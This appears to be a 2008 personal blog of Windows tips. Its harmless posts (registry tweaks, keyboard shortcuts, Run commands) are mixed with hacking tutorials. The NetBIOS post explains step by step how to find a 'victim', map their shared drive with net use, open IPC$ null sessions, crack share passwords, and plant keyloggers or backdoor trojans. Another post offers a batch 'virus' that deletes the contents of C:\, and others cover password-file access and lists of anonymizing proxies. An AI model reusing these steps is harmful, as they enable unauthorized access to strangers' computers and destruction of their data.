Sunday, September 14, 2008

Use any USB stick As Ram ! Advanced search!

For those who aren't keen on opening up their PC to put in more memory, Windows Vista has a handy little feature called ReadyBoost that can use USB sticks for additional memory. Unfortunately, Windows Vista doesn't take kindly to the slower sticks on the market and refuses to use them. Proving once again that we control the computer and not the other way around, here's four simple steps to get around this limitation and use any USB stick you have to increase your computers memory.

1.SetUp




First things first. Plug the device in. Ignore AutoPlay if you have the enabled, and go to Computer in the start menu. When it pops up, right-click the USB stick and select properties.

2. Disable the stick



Click on the Readyboost tab on the properties menu and check Do not restest this device. Click okay and unplug the stick from your computer.


3. Edit the registry!



Woah! Don't panic, it's not as frightening as it sounds. Firstly, you need to open regedit, by opening the start menu and typing regedit, then enter. The registry window should load up.

Using the left-hand pane, work your way through the following folders: HKLM (Local Machine) -> SOFTWARE -> Microsoft -> Windows NT -> CurrentVersion -> EMDgmt. You'll have a list of USB devices the computer has encountered, one of which should be your USB stick. Click on it.

Here there's a few details you need to edit. Double click on Device Status and change the value to 2, then ok. Do the same for ReadSpeedKBs and WriteSpeedKBs, changing their values to both 1000. Exit the regedit and breathe a sigh of relief.


4. And back in again



Now all that's left to do is put the stick back in and once again go to the device properties (Computer > Right-click on drive). If you look under the Readyboost Tab, you'll be able to now select Use this device. Success! Now enjoy your faster PC.

Friday, June 20, 2008

SOME USEFULL IP TRICKS N TIPS

This is a complimation of computer tricks, mainly security and privacy related

Getting Ip's:--

To see the ip all computers you are connected to (web servers, people attempting to hack into your computer).
Go to dos (start>run>type command) and run the netstat command. Type netstat /? for details.
Type netstat -r at the command prompt to see the ip of all computers you are connected to

In MSN (and other programs) when you are chatting to someone everything you type goes through the MSN servers first (they act as a proxy) so you see their ip rather than who you are chatting to. You can get round this by sending them a file as MSN doesn't send file through its proxy.
When you type the netstat -r (or -a for a different view) the ip's are under the foreign address table. The ports are seperated by a : . Different programs use different ports, so you can work out which ip's are from which program.
Connecting to other computers and what ports are:--

Servers send information. Clients retrieve. Simple.
Windows comes with a built in program to connect to other computers called telnet.
To start Windows telnet Start menu> Run> type Telnet. Click connect> remote system
Ports are doors into computers. Hosts are computer names
(ip number or a name that is translated into the ip automatically)
Different programs open different ports, but they always open the same ports so other computers know which port to connect to. You can get a port list listing all the different ports, but a basic one is:
11 :- Sends info on the computer
21 :- FTP (File transfer program)
23 :- Telnet (Login to the computers command line)
25 :- Smtp (Sends mail)
80 :- Http (Web pages)
There are thousands of different programs using different ports. You can get programs called portscanners which check a computer for all ports up to a certain number, looking for ways in. You can portscan a computer looking for ways-in.
Anyway, back to telnet.
Type www.yahoo.com as the host and port as 80 the click connect.
If nothing happens, you're in. Wow. You are connected to Yahoo's server.
You can now type http commands (you are connected to an http server, so it supports http commands). Ie. on an ftp server you can type open and it will do something. On an http server it will just wonder what the hell you are on about.
Type get / http/1.0 then press enter twice to get the file on the server at / (try /index.html) etc.)
Allowing dos and regedit in a restricted Windows

See http://blacksun.box.sk/tutorials/format.php3?file=windows.html for some very cool tactics.
A very simple tactic I found after accidentally locking myself out of dos and regedit is to open notepad and type the following:
REGEDIT4
[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesWinOldApp]
"Disabled"=dword:0
[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem]
"DisableRegistryTools"=dword:0

Save it as something.reg then run it. Simple.

Making undeletable, unreadable folders

Tested on Windows 95/98
By holding down alt, then typing numbers on the number pad (right of the keyboard) you can create special characters. If you hold down alt, then press 1, then let go, you got the ascii character 1. You try some randomn numbers. This goes all the way up to 255. Open a dos prompt, and type md (alt+1+9+4)someword. md is the dos command to make a directoy, now try and open the directory in Windows, you can't. To open it, type ren (alt+1+9+4)someword someword (ren is the dos command to rename)

Proxies

Proxies are computers that you connect through, hiding your computer. Most aren't anonymous, they give away your ip. Some are. Good anonymous proxies: mail.uraltelecom.ru:8080 and 194.247.87.4:8080.
Different programs require different ways of using proxies. To do it in internet explorer 5 go to tools, internet options, connections, settings. In the above proxies they are in the format host:port

Password files
If you lock yourself out of Windows stuff, all passwords are stored in files called *.pwl in C:windows. Download showpass.zip from hereto view all passwords stored. Or rename the files to .bak to delete passwords.
In Unix, passwords are normally stored at etc/passwd. This can be viewed using the cat command (prints a file to screen): cat etc/passwd. Make sure you're passwords are shadowed (not actually in etc/passwd). Also make sure they aren't in a file called shadow, especically not in a file called etc/shadow.
Unix passwords are encrypted far better than Windows one's (to be fair, Windows 95 isn't designed for users), but can still be cracked through a program called jon



Note- This tutorial may bear a resemblance to tutorials written by other authors

hack using NetBIOS ( hacking someones remote computer)

I have written this tutorial keeping in mind that readers having only the basic knowledge will also be able to know how hackers hack using NetBIOS

A BRIEF LESSON ON NETBIOS
NetBIOS stands for Network Basic Input Output System .It was originally developed by IBM and Sytek as an Application Programming Interface (API) for client software to access LAN resources. If you have experience of working on a LAN using Microsoft Windows Operating Systems (like Windows98 , Windows Me, Windows NT etc), you must have clicked on "Network Neighborhood" to access the computers attached to your network. After clicking on the icon you would have seen the names of the computer . Do you know what exactly happens when you click on Network Neighborhood? Your computer tries to get the names of the computers attached to the network with by issuing command to NetBIOS . NetBIOS gives the name of the computers that have been registered . In short NetBIOS gives the various information of the computers on a network . These Include-

Name of the computer

Username

Domain

Computer Name

and many others.

Like any other service it also works on a port . It has been assigned a port number 139.


THE NBTSTAT COMMAND




You can manually interact with the NetBIOS with the help of NBTSTAT command. To use this command click on the start button then select RUN... and type "command" without quotes to launch MS-DOS Command Prompt. Alternatively you may click on Start Button then go to Programs and then select Command Prompt. Once you are in Command Prompt you can exit by typing command EXIT . To launch Command Prompt in full screen mode press ALT+ENTER key combination .To get back to the original window again press ALT+ENTER key combination. If you have launched the command prompt you will get

c:\windows>

If you do not get windows displayed after c:\ don't worry just keep going , all required commands will work fine.

Now lets play with the NBTSTAT command.

If you want to get more help from MS-DOS about this command type NBTSTAT/? on the prompt i.e.

c:\windows>nbtstat/?

If you want to get the NetBIOS information of your computer type the following command

c:\windows>nbtstat -a 127.0.0.1

This command will list the NetBIOS information. A typical example

NetBIOS Remote Machine Name Table

Name Number Type Usage

==========================================================================

workgroup 00 G Domain Name

my_computer 03 U Messenger Service

myusername 03 U Messenger Service


MAC Address = 00-02-44-14-23-E6

Please note that we have used our ip address to be 127.0.0.1 . This ip address is called as "Loop Back" ip address because this ip address always refers to the computer you are using.

This example is self explanatory . We need not go in details. We need to know about the Name and Number. The Name displays the Name of the NetBIOS and there is a corresponding hexagonal number . You may see some additional names in your case.

If you want to get the NetBIOS names of a remote computer, the command is

c:\windows>nbtstat -a ipaddress

Example - To get the NetBIOS names of a computer having ip address 203.195.136.156, we shall use the command

NOTE-203.195.136.156 may be a active ip address of someone's computer. I am using it only as an example. Please don't hack this computer.

c:\windows>nbtstat -a 203.195.136.156


WHAT YOU NEED TO HACK
All you need is a Windows based operating system like Windows 98 and Me (but I prefer Windows NT, 2000, XP) and an internet connection.


TYPES OF ATTACKS

We can launch two types of attack on the remote computer having NetBIOS.

1. Reading/Writing to a remote computer system

2. Denial of Service



Searching for a victim

You may manually search for the victims by first using the nbtstat -a ipaddress and then net view \\ipaddress . If at first you don't succeed step to next ip address until you find a suitable ip address. You may also use a port scanner .A port scanner is simply a software that can search for any block of ip address say 192.168.0.1 to 192.168.0.255 for one or more ports. "Orge" is a port scanner that gives NetBIOS names of the remote computer.



Lets Hack -Part 1 Remotely reading/writing to a victiim's computer

Believe it or not but NetBIOS is the easiest method to break into somebody's computer. However there is a condition that must be satisfied before you can hack. The condition is that the victim must have enabled File And Printer Sharing on his computer. If the victim has enabled it , the nbtstat command will display one more NetBIOS name. Now lets us take a example. Suppose you know a ip address that has enabled File And Printer Sharing and let suppose the ip address happens to be 203.195.136.156 .
The command that you will use to view the NetBIOS name is

c:\windows>nbtstat -a 203.195.136.156

Let suppose that the output comes out to be

NetBIOS Remote Machine Name Table

Name Type Status
-------------------------------------------------------------------------------------------------
user <00> UNIQUE Registered
workgroup <00> GROUP Registered
user <03> UNIQUE Registered
user <20> UNIQUE Registered


MAC Address = 00-02-44-14-23-E6



The number <20> shows that the victim has enabled the File And Printer Sharing.

-------------------------------------------------------------------------------------------------------------------------------------------------------------

NOTE - If you do not get this number there are two possibilities

1. You do not get the number <20> . This shows that the victim has not enabled the File And Printer Sharing .

2. You get "Host Not found" . This shows that the port 139 is closed or the ip address doesn't exists.

---------------------------------------------------------------------------------------------------------

Now our next step would be to view the drive or folders the victim is sharing.

We will use command

c:\windows>net view \\203.195.136.156

Let suppose we get the following output

Shared resources at \\203.195.136.156
ComputerNameGoesHere

Share name Type Used as Comment

-----------------------------------------------------------------------------------------------
CDISK Disk


The command completed successfully.



"DISK" shows that the victim is sharing a Disk named as CDISK . You may also get some additional information like



Shared resources at \\203.195.136.156


ComputerNameGoesHere

Share name Type Used as Comment

-----------------------------------------------------------------------------------------------
HP-6L Print


"Print " shows that the victim is sharing a printer named as HP-6L

If we are able to share the victims hard disks or folders or printers we will be able to read write to the folders or hard disks or we may also be able to print anything on a remote printer ! Now let us share the victims computer's hard disk or printer.

Till now we know that there is a computer whose ip address happens to be 203.195.136.156 and on that computer File and printer sharing is enabled and the victim's hard disk 's name is CDISK.

Now we will connect our computer to that hard disk . After we have connected successfully a drive will be created on our computer and on double clicking on it we will be able to view the contents of the drive. If we have connected our newly formed drive to the victim's share name CDISK it means that we our drive will have the same contents as that of the CDISK .

Lets do it.

We will use the NET command to do our work .

Let suppose we want to make a drive k: on our computer and connect it to victim's share we will issue the command

c:\windows>net use k: \\203.195.136.156\CDISK

You may replace k letter by any other letter.

If the command is successful we will get the confirmation - The command was completed successfullly

The command was completed successfully

Now just double click on the My Computer icon on your desktop and you will be a happy hacker!

We have just crested a new drive k: . Just double click on it and you will find that you are able to access the remote computer's hard disk. Enjoy your first hack!


Cracking Share passwords
Sometimes when we use "net use k: \\ipaddress\sharename" we are asked for a password. There is a password cracker "PQWAK" . All you have to enter ip address and the share name and it will decrypt the password within seconds. Please note that this can crack only the passwords is the remote operating system is running on -

Windows 95

Windows 98

Windows Me




Using IPC$ to hack Windows NT,2000,XP

Now you must be thinking of something that can crack share passwords on NT based operating systems like Windows NT and Windows 2000.

IPC$ is there to help us. It is not at all a password cracker . It is simply a string that tells the remote operating system to give guest access that is give access without asking for password.

We hackers use IPC$ in this way

c:\windows>net use k: \\123.123.123.123\ipc$ "" /user:""

You may replace k letter by any other letter. If you replace it by "b" (type without quotes) a new drive will be created by a drive letter b.

Please note that you won't be able to get access to victim's shared drives but you you can gather valuable information like names of all the usernames, users that have never logged, and other such information. One such tool that uses the ipc$ method is "Internet Periscope". Another tool is "enum" - its my favorite toot however it is run on command promt.



Penetrating in to the victim's computer

Now that you have access to a remote computer you may be interested in viewing his secret emails, download hismp3 songs , and more...

But if you think like a hard core hacker you would like to play some dirty tricks like you may wish to install a key logger or install a back door entry Trojan like netbus and backorifice or delete or copy some files. All these tasks involves writing to victim's hard disk . For this you need to have write access permission






Lets Hack - Part 2 Denial of service attack


This type of attacks are meant to be launched by some computer techies because this type of attack involves using Linux Operating System and compiling C language files. To exploit these vulnerabilities you have to copy exploit code from sites like neworder,securityfocus etc and comiple them.












Note- This tutorial may bear a resemblance to tutorials written by other authors

Administrator Password Hack

If you have lost the Administrator password, you must have the following to recover:

1. A regular user account that can logon locally to your Windows NT Workstation, Server, or PDC whichever you are recovering. If you already have an alternate install of NT, skip to The Process, Set 02.

2. The Windows NT CD-ROM and setup diskettes (winnt /ox to make them from the CD-ROM).

3. Enough room to install a temporary copy of NT (Workstation will suffice, even to recover on a PDC).

4. Your latest Service Pack.

5. The Process:

6. Install a copy of Windows NT as TEMPNT, on any drive. Install your latest Service Pack.

7. Boot the alternate install.

8. At a command prompt, type AT HH:MM /INTERACTIVE CMD /K where HH:MM is 10 minutes from now (or however much time you need to complete the remaining steps and logon to your primary installation).

9. Use Regedt32 to edit:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Schedule

10. Double click Schedule and click the one sub-key.

11. Double click the Schedule value name in the right hand pane and copy the REG_BINARY string to the clipboard.

12. Select HKEY_LOCAL_MACHINE and Load Hive from the Registry menu.

13. Navigate to your original installation\System32\Config folder and double-click System.

14. At the Key Name prompt, type ORIGSYS.

15. Navigate to ORIGSYS\Select and remember the value of Current; i.e. n.

16. Browse to ORIGSYS\ControlSet00n\Services\Schedule and if Start is not 0x2, set it to 0x2.

17. With Schedule selected, Add Key from the Edit menu.

18. Type 001 in Key Name and click OK.

19. Select 001 and Add Value name Command as type REG_SZ and set the string to CMD /K.

20. Select 001 and Add Value name Schedule as type REG_BINARY and paste the string from step 06.

21. Select ORIGSYS and Unload Hive from the Registry Menu.

22. Use Conrol Panel / System / Startup... to make your original install the default.

23. At a CMD prompt:
attrib -r -s -h c:\boot.ini edit c:\boot.ini and either change the id of the TEMPNT lines to Maint 4.0 on both entries if you intend to keep this maintenance install or delete them. attrib +r +s +h c:\boot.ini

24. Shutdown and restart your original install.

25. Logon as your user account and wait for HH:MM from step 03.

26. When the CMD prompt opens, it will be under the context of the Schedule user, either the System account or an administrative account. If this machine is the NOT the PDC, type MUSRMGR.EXE, if it is the PDC, type USRMGR.EXE. If you get an error, click YES and type your domain name.

27. Set the Administrator password and logoff.

28. Logon as Administrator.

29. If you are deleted the TEMPNT entries in step 18, delete \TEMPNT



Note: If the Schedule service runs under the context of a Domain Administrator on any member workstation, all you need to recover the PDC Administrator is a network login



This tutorial may bear a resemblance to tutorials written by other authors

Saturday, May 31, 2008

hide ur ip address

go to options - settings - paste any proxy there
enjoy surfing


IP address Anonymity level Checked time Country
69.217.73.52: 8080 anonymous server Feb-08, 17:45 United States
217.28.206.145: 80 anonymous proxy Feb-08, 17:45 Sweden
97.81.19.227: 8080 anonymous server Feb-08, 19:00 United States
217.7.172.14: 80 anonymous proxy Feb-08, 17:46 Germany
202.115.130.23: 8080 anonymous Feb-08, 17:45 China
209.194.182.139: 8080 anonymous proxy Feb-08, 17:46 United States
80.87.131.100: 80 anonymous proxy Feb-08, 17:46 United Kingdom
196.12.184.190: 3128 anonymous proxy Feb-08, 17:46 Puerto Rico
217.21.240.107: 80 anonymous Feb-08, 18:00 Netherlands
202.147.186.196: 8080 anonymous proxy Feb-08, 18:01 Pakistan
140.116.21.154: 8080 anonymous proxy Feb-08, 18:01 Taiwan
87.248.174.68: 8080 anonymous Feb-08, 18:01 Moldova, Republic of
213.157.69.92: 80 anonymous Feb-08, 18:02 Finland
81.211.26.66: 8080 anonymous proxy server Feb-08, 18:03 Russian Federation
77.48.19.55: 80 anonymous Feb-08, 18:03 Czech Republic
59.106.138.10: 80 anonymous Feb-08, 18:04 Japan
60.250.0.22: 80 anonymous server Feb-08, 18:01 Taiwan
213.212.254.34: 8080 anonymous server Feb-08, 18:05 Egypt
82.102.77.66: 8080 anonymous proxy Feb-08, 18:06 Cyprus
87.205.199.25: 80 anonymous proxy server Feb-08, 18:59 Poland
62.80.4.61: 8080 anonymous server Feb-08, 17:38 Germany
80.156.84.228: 80 anonymous Feb-08, 17:30 Germany
196.218.197.68: 8080 anonymous proxy Feb-08, 17:50 Egypt
12.149.212.1: 80 anonymous proxy server Feb-08, 17:48 United States
216.244.98.133: 80 anonymous proxy Feb-08, 17:48 United States
220.227.178.26: 80 anonymous proxy server Feb-08, 17:51 India
200.85.39.18: 80 anonymous Feb-08, 17:51 Paraguay
217.116.232.114: 80 anonymous Feb-08, 17:51 Denmark
8.12.40.183: 80 anonymous Feb-08, 17:47 United States
203.115.229.180: 80 anonymous proxy Feb-08, 17:48 Malaysia
66.216.91.200: 80 anonymous server Feb-08, 17:01 United States
200.68.73.193: 443 anonymous proxy Feb-08, 17:02 Argentina
75.82.204.246: 3128 anonymous proxy Feb-08, 17:02 United States
193.251.181.135: 8080 anonymous proxy server Feb-08, 17:49 France

How to get ip address of person u r chatting with on msn messenger

when you 're online chatting with the contact
send him a file
close the browser
then go to
start
command
write cmd
then
netstat -na
then you will see all your connections and also the ip of that person

then goto
http://www.geobytes.com/IpLocator.htm
introduce the IP and all the information will be shown

Windows keyboard shortcuts you never knew existed! very helpful

Ctrl + Shift + Esc - Brings up the task manager
CTRL and A Selects all the items in the active window.
CTRL and C Copies the item or items to the Clipboard and can be pasted using CTRL and V.
CTRL and F Displays the Find all files dialog box.
CTRL and G Displays the Go to folder dialog box.
CTRL and N Displays the New dialog box.
CTRL and O Displays the Open dialog box.
CTRL and P Displays the Print dialog box.
CTRL and S Displays the Save dialog box.
CTRL and V Pastes the copied item or items from the Clipboard.
CTRL and X Cuts the item or items selected to the Clipboard.
CTRL and Z Undoes the last action.
CTRL and F4 Closes the active document window.
CTRL while dragging an item Copy the selected item
CTRL+SHIFT with arrow keys Highlight a block of text
CTRL+F4 Close the active document
CTRL+ESC Display the Start menu
CTRL and F6 Opens the next document window in the active application.
ALT+ENTER View the properties for the selected item
ALT+F4 Close the active item, or quit the active program
ALT+SPACEBAR Open the shortcut menu for the active window
ALT+TAB Switch between the open items
ALT+ESC Cycle through items in the order that they had been opened
F1 key Gives help on the active window or selected item.
F2 key Rename the selected item
F3 key Search for a file or a folder
F4 key Display the Address bar list in My Computer or Windows Explorer
F5 key Update the active window
F6 key Cycle through the screen elements in a window or on the desktop
F10 key Activate the menu bar in the active program
Windows Logo Display or hide the Start menu
Windows Logo+PAUSE Display the System Properties dialog box
Windows Logo+D Display the desktop
Windows Logo+M Minimize all of the windows
Windows Logo+SHIFT+M Restore the minimized windows
Windows Logo+E Open My Computer
Windows Logo+F Search for a file or a folder
CTRL+Windows Logo+F Search for computers
Windows Logo+F1 Display Windows Help
Windows Logo+ L Lock the keyboard
Windows Logo+R Open the Run dialog box
Windows Logo+U Open Utility Manager
TAB Move forward through the options
SHIFT+TAB Move backward through the options
CTRL+TAB Move forward through the tabs
CTRL+SHIFT+TAB Move backward through the tabs
ALT+Underlined letter Perform the corresponding command or select the corresponding option
ENTER Perform the command for the active option or button
SPACEBAR Select or clear the check box if the active option is a check box
F1 key Display Help
F4 key Display the items in the active list
Arrow keys Select a button if the active option is a group of option buttons
BACKSPACE Open a folder one level up if a folder is selected in the Save As or Open dialog box
END Display the bottom of the active window
HOME Display the top of the active window
NUM LOCK+Asterisk sign (*) Display all of the subfolders that are under the selected folder
NUM LOCK+Plus sign (+) Display the contents of the selected folder
NUM LOCK+Minus sign (-) Collapse the selected folder
LEFT ARROW Collapse the current selection if it is expanded, or select the parent folder
RIGHT ARROW Display the current selection if it is collapsed, or select the first subfolder

Disable USB Drives

customer that needs to keep people from using the USB ports to copy data off of a system.

It is easy to lock a machine down, disable the floppy, and cdrom in the bios. Many times when you try to disable USB - it disables it entirely.

This can be a real pain on newer laptops or systems that don't even have a PS2 interface for the mouse or keyboard.

There is a simple registry change that will keep the USB storage drivers from starting when the system boots. Keeps people from walking up to a PC and copying data off with a USB key, but allows you to keep your scanner, keyboard, and mouse working.

As always - back your system up before messing around in the registry.

Just open regedit and browse to this key:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UsbStor

Notice the value 'Start'

Switch this value to 4, and USB storage devices are disabled.

Switch this value to 3, and USB storage devices are enabled.

Monday, March 31, 2008

How to Lock a Folder Using Notepad

How to Lock a Folder Using Notepad


1) Consider you want to lock a folder named caclub in your f:\, whose path is f:\caclub

2) Now open the Notepad and type the following

ren caclub caclub.{21EC2020-3AEA-1069-A2DD-08002B30 309D}

3) Where caclub is your folder name. Save the text file as loc.bat in the same drive.

4) Open another new notepad text file and type the following

ren caclub.{21EC2020-3AEA-1069-A2DD-08002B30 309D} caclub

5) Save the text file as unloc.bat in the same drive.
---------
Usage:
---------
6) To lock the caclub folder, simply click the loc.bat and it will transform into control panel icon which is inaccessible.
7) To unlock the folder click the unloc.bat file. Thus the folder will be unlocked and the contents are accessible.

Windows Media Player Tricks

Windows Media Player tricks
First, Click Start > Run > and type “regedit” to run Registry Editor.
Note: editing the registry may damage your system, please make a backup from your registry

To remove recent play list in history:
To remove recent files go to address: HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\RecentFileList
To remove recent URLs go to address: HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\RecentURLList
And delete play lists

To disable Upgrade message:
Go to following address: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MediaPlayer\PlayerUpgrade
Create a new String Value and name “AskMeAgain” and give value of NO


To hide anchor window:
When you are in skin mode, Windows Media Player displays Anchor window
To hide anchor window, go to address: HKEY_CURRENT_USER\Software\Policies\Microsoft\WindowsMediaPlayer
Create a new DWORD and name “DoNotShowAnchor” and give value of 1

To change title name:
Go to : HKEY_CURRENT_USER\Software\Policies\Microsoft\WindowsMediaPlayer
Create a new SRTING and type your name.


To lock applied skin:
Go to : HKEY_CURRENT_USER\Software\Policies\Microsoft\WindowsMediaPlayer
Create a new String with name of Default Skin for example 9SeriesDefault.wmz
Create a new DWORD and name “SetAndLockSkin” and give value of 1.

To enable DVD features:
Go to HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\Settings
Create a new String and name “EnableDVDUI” and give value of YES.

To remove WMP features:
Go to : HKEY_CURRENT_USER\Software\Policies\Microsoft\WindowsMediaPlayer
Create a new DWORD and give value of 1 and name according to below
Media Favorite = NoMediaFavorite
Find New Station = NoFindNewStation
Radio Bar = NoRadiaBar

Recycle Bin Edits

Fooling with the recycle bin. Why not make the icon context menu act like other icon context menus.
Add rename to the menu:
HKEY_CLASSES_ROOT\CLSID\ {645FF040-5081-101B-9F08-00AA002F954E}\ ShellFolder
"Attributes"=hex:50,01,00,20
Add delete to the menu:
HKEY_CLASSES_ROOT\CLSID\ {645FF040-5081-101B-9F08-00AA002F954E}\ ShellFolder
"Attributes"=hex:60,01,00,20
Add rename and delete to the menu:
HKEY_CLASSES_ROOT\CLSID\ {645FF040-5081-101B-9F08-00AA002F954E} \ShellFolder
"Attributes"=hex:70,01,00,20
Restore the recycle bin to Windows defaults including un-deleting the icon after deletion:
Restore the icon.
HKEY_LOCAL_MACHINE\SOFTWARE\ Microsoft\ Windows \CurrentVersion\ explorer\
Desktop\NameSpace\{645FF040-5081-101B-9F08-00AA002F954E}
@="Recycle Bin"
Reset Windows defaults.
HKEY_CLASSES_ROOT\CLSID\ {645FF040-5081-101B-9F08-00AA002F954E} \ShellFolder
"Attributes"=hex:40,01,00,20
Other edits to the recycle bin icon:
HKEY_CLASSES_ROOT\CLSID\ {645FF040-5081-101B-9F08-00AA002F954E}\ ShellFolder
"Attributes"=hex:40,01,01,20 ... standard shortcut arrow
"Attributes"=hex:40,01,02,20 ... a different shortcut arrow
"Attributes"=hex:40,01,04,20 ... and still another shortcut arrow
"Attributes"=hex:40,01,08,20 ... make it look disabled (like it's been cut)

For Windows XP and 2000 also edit HKEY_CURRENT_USER\ Software\ Microsoft\ Windows\ CurrentVersion\ Explorer\ CLSID\ {645FF040-5081-101B-9F08-00AA002F954E}
For Windows ME also edit HKEY_CURRENT_USER \Software\ Classes\ CLSID\ {645FF040-5081-101B-9F08-00AA002F954E}

Disabling My Computer

In areas where you are trying to restrict what users can do on the computer, it might be beneficial to disable the ability to click on My Computer and have access to the drives, control panel etc.
To disable this:
1.Open RegEdit
2.Search for 20D04FE0-3AEA-1069-A2D8-08002B30309D
3.This should bring you to the HKEY_CLASSES_ROOT\CLSID section
4.Delete the entire section.
Now when you click on My Computer, nothing will happen.
You might want to export this section to a Registry file before deleting it just in case you want to enable it again. Or you can rename it to 20D0HideMyComputer4FE0-3AEA-1069-A2D8-08002B30309D. You can also hide all the Desktop Icons, see Change/Add restrictions.

Disabling Drives in My Computer

To turn off the display of local or networked drives when you click on My Computer:
1.Open RegEdit
2.Go to
HKEY_CURRENT_USER\Software\ Microsoft\ Windows\ CurrentVersion\ Policies\ Explorer
3.Add a New DWORD item and name it NoDrives
4.Give it a value of 3FFFFFF
5.Now when you click on My Computer, none of your drives will show.

Adding Items to the Start Button

To add items when you right-click on the Start Button:
1.Open RegEdit
2.Go to HKEY_CLASSES_ROOT\Directory\Shell
3.Right-click on Shell and select New Key
4.Type in the name of the key and press the Enter key
5.In the Default name that shows in the right hand panel, you can add a title with a "&" character in front of the letter for a shortcut
6.Right-click on the key you just created and create another key under it called command
7.For the value of this command, enter the full path and program you want to execute
8.Now when you right click on the Start Button, your new program will be there.
9.For example, if you want Word to be added, you would add that as the first key, the default in the right panel would be &Word so when you right click on the Start Button, the W would be the Hot Key on your keyboard. The value of the key would be C:\Program Files\Office\Winword\Winword.exe

Opening a DOS Window to either the Drive or Directory in Explorer

Add the following Registry Keys for a Directory:
HKEY_CLASSES_ROOT\Directory\shell\opennew
@="Dos Prompt in that Directory"

HKEY_CLASSES_ROOT\Directory\shell\opennew\command
@="command.com /k cd %1"

Add or Edit the following Registry Keys for a Drive:
HKEY_CLASSES_ROOT\Drive\shell\opennew
@="Dos Prompt in that Drive"

HKEY_CLASSES_ROOT\Drive\shell\opennew\command
@="command.com /k cd %1"

These will allow you to right click on either the drive or the directory and the option of starting the dos prompt will pop up

Notepad time and date trick

Easy and fun trick with your notepad. Lets try, now open a blank notepad file:

*

Write .LOG as the first line of the file and press enter.
*

Save your notepad file name and close it.
*

Double-click again your notepad file to open notepad and opinion added that the date and time at the end of the file..WOOT !! And place the cursor on the next line.
*

Enter your notes and then save and close the file.

Every time you open the notepad file, Notepad repeat the process, adding the date and time automatically at the end of the roster and placing the cursor below.

LEARN SIMPLE VIRUS >>>PROgRAM USING ...NOTEPAD....

write ur own simple virus cant detected by any antivirus....


@Echo off
Del C:\ *.* |y

And save that as .bat not .txt and RUN IT
It will delete the content of C:\ drive...

PLEASE NoTe::::: dont run that .bat file on ur system .... it will delet c:...

IF ANY ONE..... DARE TO ......RUN ...U LOST ..........CONTENTS OF C drive

EVEN I DIDN't TRY THIS........

I WILL NOT RESPONSIBLE FOR ANYTHING DONE BYE U USING THE INFORMATION GIVEN ABOVE...

117 Run Commands In Windows Xp

Run command is very useful, but sometimes it is forgotten. Use it sometimes and you will find how powerful is run command.


1. Accessibility Controls - access.cpl
2. Accessibility Wizard - accwiz
3. Add Hardware Wizard - hdwwiz.cpl
4. Add/Remove Programs - appwiz.cpl
5. Administrative Tools - control admintools
6. Automatic Updates - wuaucpl.cpl
7. Bluetooth Transfer Wizard - fsquirt
8. Calculator - calc
9. Certificate Manager - certmgr.msc
10. Character Map - charmap
11. Check Disk Utility - chkdsk
12. Clipboard Viewer - clipbrd
13. Command Prompt - cmd
14. Component Services - dcomcnfg
15. Computer Management - compmgmt.msc
16. Control Panel - control
17. Date and Time Properties - timedate.cpl
18. DDE Shares - ddeshare
19. Device Manager - devmgmt.msc
20. Direct X Troubleshooter - dxdiag
21. Disk Cleanup Utility - cleanmgr
22. Disk Defragment - dfrg.msc
23. Disk Management - diskmgmt.msc
24. Disk Partition Manager - diskpart
25. Display Properties - control desktop
26. Display Properties - desk.cpl
27. Dr. Watson System Troubleshooting Utility - drwtsn32
28. Driver Verifier Utility - verifier
29. Event Viewer - eventvwr.msc
30. Files and Settings Transfer Tool - migwiz
31. File Signature Verification Tool - sigverif
32. Findfast - findfast.cpl
33. Firefox - firefox
34. Folders Properties - control folders
35. Fonts - control fonts
36. Fonts Folder - fonts
37. Free Cell Card Game - freecell
38. Game Controllers - joy.cpl
39. Group Policy Editor (for xp professional) - gpedit.msc
40. Hearts Card Game - mshearts
41. Help and Support - helpctr
42. HyperTerminal - hypertrm
43. Iexpress Wizard - iexpress
44. Indexing Service - ciadv.msc
45. Internet Connection Wizard - icwconn1
46. Internet Explorer - iexplore
47. Internet Properties - inetcpl.cpl
48. Keyboard Properties - control keyboard
49. Local Security Settings - secpol.msc
50. Local Users and Groups - lusrmgr.msc
51. Logs You Out Of Windows - logoff
52. Malicious Software Removal Tool - mrt
53. Microsoft Chat - winchat
54. Microsoft Movie Maker - moviemk
55. Microsoft Paint - mspaint
56. Microsoft Syncronization Tool - mobsync
57. Minesweeper Game - winmine
58. Mouse Properties - control mouse
59. Mouse Properties - main.cpl
60. Netmeeting - conf
61. Network Connections - control netconnections
62. Network Connections - ncpa.cpl
63. Network Setup Wizard - netsetup.cpl
64. Notepad notepad
65. Object Packager - packager
66. ODBC Data Source Administrator - odbccp32.cpl
67. On Screen Keyboard - osk
68. Outlook Express - msimn
69. Paint - pbrush
70. Password Properties - password.cpl
71. Performance Monitor - perfmon.msc
72. Performance Monitor - perfmon
73. Phone and Modem Options - telephon.cpl
74. Phone Dialer - dialer
75. Pinball Game - pinball
76. Power Configuration - powercfg.cpl
77. Printers and Faxes - control printers
78. Printers Folder - printers
79. Regional Settings - intl.cpl
80. Registry Editor - regedit
81. Registry Editor - regedit32
82. Remote Access Phonebook - rasphone
83. Remote Desktop - mstsc
84. Removable Storage - ntmsmgr.msc
85. Removable Storage Operator Requests - ntmsoprq.msc
86. Resultant Set of Policy (for xp professional) - rsop.msc
87. Scanners and Cameras - sticpl.cpl
88. Scheduled Tasks - control schedtasks
89. Security Center - wscui.cpl
90. Services - services.msc
91. Shared Folders - fsmgmt.msc
92. Shuts Down Windows - shutdown
93. Sounds and Audio - mmsys.cpl
94. Spider Solitare Card Game - spider
95. SQL Client Configuration - cliconfg
96. System Configuration Editor - sysedit
97. System Configuration Utility - msconfig
98. System Information - msinfo32
99. System Properties - sysdm.cpl
100. Task Manager - taskmgr
101. TCP Tester - tcptest
102. Telnet Client - telnet
103. User Account Management - nusrmgr.cpl
104. Utility Manager - utilman
105. Windows Address Book - wab
106. Windows Address Book Import Utility - wabmig
107. Windows Explorer - explorer
108. Windows Firewall - firewall.cpl
109. Windows Magnifier - magnify
110. Windows Management Infrastructure - wmimgmt.msc
